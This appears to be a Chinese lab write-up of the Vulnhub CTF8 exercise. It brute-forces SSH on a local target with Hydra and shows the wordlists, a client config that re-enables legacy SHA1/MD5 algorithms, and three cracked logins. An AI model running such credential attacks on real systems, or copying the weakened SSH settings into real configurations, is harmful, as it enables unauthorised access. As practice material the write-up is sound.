靶机IP:192.168.1.9
本机IP:192.168.1.7
操作系统:
┌──(kali㉿kali)-[~/Desktop]
└─$ uname -a
Linux kali 6.1.0-kali9-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.27-1kali1 (2023-05-12) x86_64 GNU/Linux
username和password字典
┌──(kali㉿kali)-[~/Desktop]
└─$ cat u.txt
admin
Barbara
Jim
Sherry
Susan
George
Juan
Michael
Xavier
Sally
test
Barbara
Steve
test
Xavier
Juan
Dan
Stacey
Tom
Gene
Johnathan
George
Sherry
Jeff
John
Jerome
Michael
Sally
Susan
Harvey
admin
Jim
bdio
spinkton
jharraway
┌──(kali㉿kali)-[~/Desktop]
└─$ cat p.txt
football123
passw0rd
letmein!
1website
BobMarley
12341234
swanson
cherry
thundercats
fantasy
Password
注意:username中的部分数据来源 作者:川川小宝-CSDN博客ctf8 vulnhub靶场-CSDN博客文章浏览阅读303次。ctf8 vulnhub靶场; 这个靶场对我一个初学者来说有点复杂 :-(_ctf8https://blog.csdn.net/weixin_62621015/article/details/129412619
首次尝试hydra的ssh爆破发生错误,错误提示如下:
┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -L u.txt -P p.txt ssh://192.168.1.9
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-15 23:33:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 385 login tries (l:35/p:11), ~25 tries per task
[DATA] attacking ssh://192.168.1.9:22/
[ERROR] could not connect to ssh://192.168.1.9:22 - kex error : no match for method kex algos: server [diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1], client [curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256]
由于网络上暂时也没看到解决方法(初略看了下),后面问了下AI,AI给的方案是调整本机的/etc/ssh/sshd_config或者~/.ssh/config 。
┌──(kali㉿kali)-[~/.ssh]
└─$ ls
config known_hosts ssh_config
┌──(kali㉿kali)-[~/.ssh]
└─$ pwd
/home/kali/.ssh
┌──(kali㉿kali)-[~/.ssh]
└─$ cat config
# KexAlgorithms curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha2
#
Host 192.168.1.9
KexAlgorithms diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
HostKeyAlgorithms ssh-rsa,ssh-dss
# Ciphers 3des-cbc
MACs hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
调整完成后,`kydra`即可正常工作。
┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -L u.txt -P p.txt ssh://192.168.1.9
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-15 23:35:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 385 login tries (l:35/p:11), ~25 tries per task
[DATA] attacking ssh://192.168.1.9:22/
[STATUS] 283.00 tries/min, 283 tries in 00:01h, 108 to do in 00:01h, 10 active
[22][ssh] host: 192.168.1.9 login: bdio password: passw0rd
[22][ssh] host: 192.168.1.9 login: spinkton password: football123
[22][ssh] host: 192.168.1.9 login: jharraway password: letmein!
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-15 23:37:04